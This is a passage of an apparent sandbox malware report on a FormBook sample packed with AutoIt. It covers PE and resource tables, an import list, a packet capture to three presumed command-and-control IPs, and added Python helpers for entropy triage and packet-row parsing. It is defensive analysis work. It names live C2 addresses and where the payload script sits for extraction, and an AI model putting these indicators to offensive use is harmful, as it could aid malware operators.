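    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, bytes(range(16)) * 256),
    (".rsrc", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ, bytes(_rng.getrandbits(8) for _ in range(4096))),
]

if __name__ == "__main__":
    info = parse_pe(build_sample_pe(SAMPLE_SECTIONS))
    print(info["timestamp_utc"], [(s["name"], s["entropy"]) for s in info["sections"]])
    print("\n".join(triage(info)))
```

Run against the real sample the same walker reports the values in the table above: .rsrc at 7.96 is the only section over the threshold, .text at 6.68 is ordinary compiled code, the SECURITY directory is empty, and NX_COMPAT is absent from DllCharacteristics (DYNAMIC_BASE and TERMINAL_SERVER_AWARE are the only flags set).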
Name           RVA       Size     Type                                                                                   Language  Country        ZLIB Complexity
RT_ICON        0xc8488   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192                         English   Great Britain  0.7466216216216216
RT_ICON        0xc85b0   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors    English   Great Britain  0.3277027027027027
RT_ICON        0xc86d8   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192                         English   Great Britain  0.3885135135135135
RT_ICON        0xc8800   0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 4224                       English   Great Britain  0.28189493433395874
RT_ICON        0xc98a8   0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 1088                       English   Great Britain  0.5487588652482269
RT_MENU        0xc9d10   0x50     data                                                                                   English   Great Britain  0.9
RT_STRING      0xc9d60   0x594    data                                                                                   English   Great Britain  0.3333333333333333
RT_STRING      0xca2f4   0x68a    data                                                                                   English   Great Britain  0.2747909199522103
RT_STRING      0xca980   0x490    data                                                                                   English   Great Britain  0.3715753424657534
RT_STRING      0xcae10   0x5fc    data                                                                                   English   Great Britain  0.3087467362924282
RT_STRING      0xcb40c   0x65c    data                                                                                   English   Great Britain  0.34336609336609336
RT_STRING      0xcba68   0x466    data                                                                                   English   Great Britain  0.3605683836589698
RT_STRING      0xcbed0   0x158    Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0                       English   Great Britain  0.502906976744186
RT_RCDATA      0xcc028   0x4d484  data                                                                                   (none)    (none)         1.0003348623273565
RT_GROUP_ICON  0x1194ac  0x22     data                                                                                   English   Great Britain  1.0588235294117647
RT_GROUP_ICON  0x1194d0  0x14     data                                                                                   English   Great Britain  1.25
RT_GROUP_ICON  0x1194e4  0x14     data                                                                                   English   Great Britain  1.15
RT_GROUP_ICON  0x1194f8  0x14     data                                                                                   English   Great Britain  1.25
RT_VERSION     0x11950c  0xdc     data                                                                                   English   Great Britain  0.6181818181818182
RT_MANIFEST    0x1195e8  0x3ef    ASCII text, with CRLF line terminators                                                 English   Great Britain  0.5074478649453823
Note: the RT_RCDATA entry at 0xcc028 (0x4d484 bytes, no language tag, ZLIB complexity of about 1.0, i.e. it does not compress any further) is what pushes the .rsrc section to an entropy of 7.96 in the section table. A compiled AutoIt binary stores its compressed script in exactly such an RCDATA resource, so this blob, not the interpreter's .text, is where the script logic lives and is the thing to extract and decompile. The icons, menu, string tables, version block and manifest are the interpreter's stock resources.
DLL: Imports
WSOCK32.dll: WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll: GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll: timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll: ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll: WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll: InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL: GetProcessMemoryInfo
IPHLPAPI.DLL: IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll: DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll: IsThemeActive
KERNEL32.dll: DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll: AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll: StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll: GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll: LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system: English
Country where language is spoken: Great Britain
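When the packet list that follows is copied out of the report as plain text, its five columns are concatenated with no separator, e.g. `Sep 3, 2024 13:53:31.809596062 CEST4973680192.168.2.4194.233.65.154`. That string cannot be split by position alone: the digit run `4973680` cuts as 49736/80, 4973/680 or 497/3680, and `2.4194` as 2.4 + 194 or 2.41 + 94. The Python below is an added example, not part of the Joe Sandbox report: it enumerates every syntactically legal reading of such a row and keeps the one consistent with two assumptions, both stated in the code, namely that the analysis VM is 192.168.2.4 as the table shows, and that the VM's side of each TCP connection uses a port in the Windows dynamic range 49152 to 65535 while the remote side does not. A row that still has zero or several readings is reported instead of guessed. The six rows embedded in `SAMPLE_ROWS` are copied from the packet table of this report; everything else is illustrative.

```python
"""Recover (timestamp, ports, addresses) from the concatenated packet rows of a Joe Sandbox report.

Added example, not part of the report. SAMPLE_ROWS are six rows copied from the packet
table of this report; LOCAL_HOST and EPHEMERAL are the two assumptions used to choose
between readings when a digit run can be cut more than one way.
"""
import re

LOCAL_HOST = "192.168.2.4"        # the analysis VM, as it appears in the report's packet table
EPHEMERAL = range(49152, 65536)   # assumption: Windows default dynamic (client) port range

ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) "
    r"(?P<tz>[A-Z]{3,5})(?P<blob>[\d.]+)$"
)

SAMPLE_ROWS = [  # copied from the report's packet table
    "Sep 3, 2024 13:53:31.809596062 CEST4973680192.168.2.4194.233.65.154",
    "Sep 3, 2024 13:53:31.814415932 CEST8049736194.233.65.154192.168.2.4",
    "Sep 3, 2024 13:53:47.851542950 CEST4973880192.168.2.445.157.69.194",
    "Sep 3, 2024 13:53:47.856487036 CEST804973845.157.69.194192.168.2.4",
    "Sep 3, 2024 13:54:01.617245913 CEST4974280192.168.2.437.187.158.211",
    "Sep 3, 2024 13:54:01.623166084 CEST804974237.187.158.211192.168.2.4",
]


def _octet(t: str) -> bool:
    return t.isdigit() and (t == "0" or t[0] != "0") and int(t) <= 255


def _port(t: str) -> bool:
    return t.isdigit() and t[0] != "0" and int(t) <= 65535


def candidates(blob: str) -> list:
    """Every legal (sport, dport, src, dst) reading of 'PPPPPPa.b.c.de.f.g.h'."""
    parts = blob.split(".")
    if len(parts) != 7 or not all(_octet(p) for p in (parts[1], parts[2], parts[4], parts[5], parts[6])):
        return []
    out = []
    for k in (1, 2, 3):                      # digits belonging to the first octet of src
        ports, a1 = parts[0][:-k], parts[0][-k:]
        if not ports or not _octet(a1):
            continue
        for j in range(1, len(ports)):       # cut between source port and destination port
            sp, dp = ports[:j], ports[j:]
            if not (_port(sp) and _port(dp)):
                continue
            for m in (1, 2, 3):              # digits belonging to the last octet of src
                a4, b1 = parts[3][:m], parts[3][m:]
                if _octet(a4) and _octet(b1):
                    out.append((int(sp), int(dp),
                                ".".join((a1, parts[1], parts[2], a4)),
                                ".".join((b1, parts[4], parts[5], parts[6]))))
    return out


def plausible(c: tuple) -> bool:
    """Exactly one endpoint is the VM, and only the VM's port is in the dynamic range."""
    sp, dp, src, dst = c
    if src == LOCAL_HOST and dst != LOCAL_HOST:
        return sp in EPHEMERAL and dp not in EPHEMERAL
    if dst == LOCAL_HOST and src != LOCAL_HOST:
        return dp in EPHEMERAL and sp not in EPHEMERAL
    return False


def parse_row(line: str) -> dict:
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised row: {line!r}")
    readings = [c for c in candidates(m["blob"]) if plausible(c)]
    if len(readings) != 1:                   # refuse to guess; surface the row for manual review
        raise ValueError(f"{len(readings)} plausible readings for {line!r}: {readings}")
    sp, dp, src, dst = readings[0]
    return {"time": m["ts"], "tz": m["tz"], "sport": sp, "dport": dp, "src": src, "dst": dst}


def summarize(rows) -> dict:
    """Group packets into client connections keyed by (client port, remote host, remote port)."""
    conns = {}
    for line in rows:
        r = parse_row(line)
        outbound = r["src"] == LOCAL_HOST
        key = (r["sport"], r["dst"], r["dport"]) if outbound else (r["dport"], r["src"], r["sport"])
        c = conns.setdefault(key, {"first_seen": r["time"], "out": 0, "in": 0})
        c["out" if outbound else "in"] += 1
    return conns


def remote_endpoints(conns: dict) -> list:
    """Distinct (host, port) pairs the VM talked to: the network IOCs of the run."""
    return sorted({(host, port) for _, host, port in conns})


if __name__ == "__main__":
    conns = summarize(SAMPLE_ROWS)
    for key, c in sorted(conns.items()):
        print(key, c)
    print(remote_endpoints(conns))
```

Fed the complete table, `summarize` yields one entry per client port (49736, 49738 to 49743), all to port 80, and `remote_endpoints` returns the three hosts, which is the list to check against the report's HTTP section before treating any of them as a controller.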
Note: every packet below is TCP/80 between the analysis VM (192.168.2.4) and three remote hosts contacted in turn, 194.233.65.154, then 45.157.69.194, then 37.187.158.211, each on a fresh client port (49736, 49738 to 49743): a sequence of short HTTP exchanges, not one persistent session. FormBook walks a list of candidate C2 hosts, most of which are decoys, so appearing here does not by itself make a host a live controller; each should be confirmed against the request/response content before being treated as one.
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Sep 3, 2024 13:53:31.809596062 CEST  49736        80         192.168.2.4     194.233.65.154
Sep 3, 2024 13:53:31.814415932 CEST  80           49736      194.233.65.154  192.168.2.4
Sep 3, 2024 13:53:31.814502001 CEST  49736        80         192.168.2.4     194.233.65.154
Sep 3, 2024 13:53:31.821599960 CEST  49736        80         192.168.2.4     194.233.65.154
Sep 3, 2024 13:53:31.826390982 CEST  80           49736      194.233.65.154  192.168.2.4
Sep 3, 2024 13:53:32.768141985 CEST  80           49736      194.233.65.154  192.168.2.4
Sep 3, 2024 13:53:32.768157959 CEST  80           49736      194.233.65.154  192.168.2.4
Sep 3, 2024 13:53:32.768168926 CEST  80           49736      194.233.65.154  192.168.2.4
Sep 3, 2024 13:53:32.768213987 CEST  80           49736      194.233.65.154  192.168.2.4
Sep 3, 2024 13:53:32.768224955 CEST  80           49736      194.233.65.154  192.168.2.4
Sep 3, 2024 13:53:32.768234968 CEST  80           49736      194.233.65.154  192.168.2.4
Sep 3, 2024 13:53:32.768246889 CEST  80           49736      194.233.65.154  192.168.2.4
Sep 3, 2024 13:53:32.768337965 CEST  49736        80         192.168.2.4     194.233.65.154
Sep 3, 2024 13:53:32.768337965 CEST  49736        80         192.168.2.4     194.233.65.154
Sep 3, 2024 13:53:32.768424034 CEST  80           49736      194.233.65.154  192.168.2.4
Sep 3, 2024 13:53:32.768445969 CEST  80           49736      194.233.65.154  192.168.2.4
Sep 3, 2024 13:53:32.768455982 CEST  80           49736      194.233.65.154  192.168.2.4
Sep 3, 2024 13:53:32.768466949 CEST  49736        80         192.168.2.4     194.233.65.154
Sep 3, 2024 13:53:32.768492937 CEST  49736        80         192.168.2.4     194.233.65.154
Sep 3, 2024 13:53:32.768543959 CEST  80           49736      194.233.65.154  192.168.2.4
Sep 3, 2024 13:53:32.768589020 CEST  49736        80         192.168.2.4     194.233.65.154
Sep 3, 2024 13:53:32.785926104 CEST  49736        80         192.168.2.4     194.233.65.154
Sep 3, 2024 13:53:32.790712118 CEST  80           49736      194.233.65.154  192.168.2.4
Sep 3, 2024 13:53:47.851542950 CEST  49738        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:47.856487036 CEST  80           49738      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:47.856595039 CEST  49738        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:47.873534918 CEST  49738        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:47.878381014 CEST  80           49738      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:48.732291937 CEST  80           49738      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:48.732312918 CEST  80           49738      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:48.732434034 CEST  49738        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:49.385509968 CEST  49738        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:50.403922081 CEST  49739        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:50.408808947 CEST  80           49739      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:50.408901930 CEST  49739        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:50.418615103 CEST  49739        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:50.423440933 CEST  80           49739      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:51.267524004 CEST  80           49739      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:51.267765999 CEST  80           49739      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:51.267824888 CEST  49739        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:51.932363987 CEST  49739        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:52.951236010 CEST  49740        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:52.956360102 CEST  80           49740      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:52.956485987 CEST  49740        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:52.967376947 CEST  49740        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:52.972711086 CEST  80           49740      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:52.972721100 CEST  80           49740      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:52.972728968 CEST  80           49740      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:52.972738028 CEST  80           49740      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:52.972745895 CEST  80           49740      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:52.972755909 CEST  80           49740      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:52.972763062 CEST  80           49740      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:52.972770929 CEST  80           49740      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:52.972780943 CEST  80           49740      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:53.803051949 CEST  80           49740      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:53.803174019 CEST  80           49740      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:53.803276062 CEST  49740        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:54.479284048 CEST  49740        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:55.509927988 CEST  49741        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:55.697953939 CEST  80           49741      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:55.698333979 CEST  49741        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:55.705291033 CEST  49741        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:55.710112095 CEST  80           49741      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:56.540819883 CEST  80           49741      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:56.540868044 CEST  80           49741      45.157.69.194   192.168.2.4
Sep 3, 2024 13:53:56.541946888 CEST  49741        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:56.559426069 CEST  49741        80         192.168.2.4     45.157.69.194
Sep 3, 2024 13:53:56.564279079 CEST  80           49741      45.157.69.194   192.168.2.4
Sep 3, 2024 13:54:01.617245913 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:01.623166084 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:01.623254061 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:01.633040905 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:01.637801886 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.507756948 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.507776976 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.507791996 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.507803917 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.507814884 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.507826090 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.507838964 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.507849932 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.507848978 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:02.507860899 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.507874966 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.507941961 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:02.507941961 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:02.512782097 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.512795925 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.512851954 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:02.591015100 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.591027975 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.591043949 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.591058016 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.591130018 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:02.591238022 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:02.595738888 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.595753908 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.595765114 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.595777988 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.595827103 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:02.595913887 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:02.596039057 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.600497007 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.600508928 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.600579023 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:02.600601912 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.600656033 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:02.605446100 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.605458021 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.605468035 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.605480909 CEST  80           49742      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:02.605529070 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:02.605624914 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:03.158821106 CEST  49742        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:04.173247099 CEST  49743        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:04.178251028 CEST  80           49743      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:04.178369999 CEST  49743        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:04.189402103 CEST  49743        80         192.168.2.4     37.187.158.211
Sep 3, 2024 13:54:04.194256067 CEST  80           49743      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:05.265578032 CEST  80           49743      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:05.265598059 CEST  80           49743      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:05.265609026 CEST  80           49743      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:05.265614986 CEST  80           49743      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:05.265625000 CEST  80           49743      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:05.265635967 CEST  80           49743      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:05.265652895 CEST  80           49743      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:05.265662909 CEST  80           49743      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:05.265672922 CEST  80           49743      37.187.158.211  192.168.2.4
Sep 3, 2024 13:54:05.265683889 CEST  80           49743      37.187.158.211  192.168.2.4
